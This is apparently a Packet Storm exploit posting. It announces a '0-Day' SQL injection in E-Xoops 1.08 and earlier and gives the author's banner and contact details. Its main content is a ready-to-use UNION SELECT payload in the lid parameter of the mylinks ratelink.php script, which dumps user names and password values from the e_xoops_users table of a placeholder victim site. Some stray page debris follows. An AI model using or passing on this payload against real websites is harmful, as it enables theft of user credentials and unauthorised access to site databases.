E-Xoops versions 1.08 and below suffer from the same SQL injection vulnerability discovered in version 1.05 back in December of 2007.
122cdf5204ed409e61d652ebd671a3587a8cc70e785f4bb28ca4bbebbff067ca######################################################################################
#
#
# Author: Dante90, WaRWolFz
Crew #
# Title: [0-Day] SQL Injection E-Xoops <= 1.08 By
Dante90 #
# MSN: dante90.dmc4@hotmail.it
#
# Web: www.warwolfz.org
#
#
#
######################################################################################
[0-Day] SQL Injection E-Xoops <= 1.08 By Dante90
[code]
http://www.victime_site.org/WaRWolFz/modules/mylinks/ratelink.php?lid=-1UNION
SELECT CONCAT(name,CHAR(32,58,32),pass) FROM e_xoops_users--
[/code]
Dante90
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed